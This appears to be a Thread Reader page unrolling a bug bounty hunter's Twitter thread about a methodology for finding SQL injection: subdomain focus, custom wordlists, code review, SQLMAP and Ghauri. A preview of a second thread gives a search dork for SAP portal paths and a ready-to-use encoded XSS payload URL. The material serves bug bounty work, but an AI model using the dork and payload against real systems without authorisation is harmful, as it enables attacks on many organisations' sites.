Share this page!

NS 🍥 Profile picture
Twitter logo
Feb 18 7 tweets 4 min read
You guys always ask me how do I find SQL injections, its just simple. Avoid what everyone does and make your own methodology. Here is mine:

1. I don't normally go if the target is just target.com. I always prefer the target with wide scope.

1/n
 #BugBounty
2. I always prefer to avoid main domain & focus on subdomain instead. Main domain is targeted by hundreds already, So go deeper, if you go deeper its more dark there & you will see its less crowded.

3. Make your own word-list using CeWL or anything

#bugbountytips

2/n
4. Use your word list to find hidden parameters. Read this well written article by @KathanP19 medium.com/geekculture/pa…

5. Use your word list to find hidden subdomains, I found 10s of more subdomains using WL created using the common words used in the source.
3/n
6. Code Review: This should your approach for everything. The JavaScript or a simple source-code review will make you understand how the application works. This will as well help you to find more and more hidden parameters.

Read: hackerone.com/vulnerability-…
4/n
7. Use SQLMAP and Ghauri by @r0oth3x49 extensively. In a lot of cases I found Ghauri was faster than SQLMAP with less false-positives. Make sure to try different techniques, bypass scripts. Do not forget to watch @GodfatherOrwa methodology here: youtube.com/playlist?list=…

5/n
Read this list, there are lot of HackerOne reports listed specially SQL injection related. Read 2-3 articles per day and understand the methodology used by others and create your own based on it.

github.com/reddelexc/hack…

6/n
And lastly, make your own methodology. My methodology works works for me, it may not work for you. I spent months reading, trying different ways and failing multiple times b4 getting here, so don't expect the results next day. Practice and make yourself perfect.
Goodluck.

7/n

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with NS 🍥

NS 🍥 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @nav1n0x

NS 🍥 Profile picture
Jun 28, 2022
Find an easy #XSS that found all-over the internet.
Dork: inurl:"/irj/portal/" > visit the target, remove "/irj/portal/" from the url & add the payload in 2nd tweet. There are thousands of huge orgs with this #XSS, I reported > 150. Thank me later.#BugBountyTips #infosec
/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp

#SAP
Eg: http://target[.]com/SAPIrExtHelp/random/"><SVG ONLOAD%3d%26%2397%26%23108%26%23101%26%23114%26%23116(%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e)>.asp if vulnerable boom =>XSS.
Read 5 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(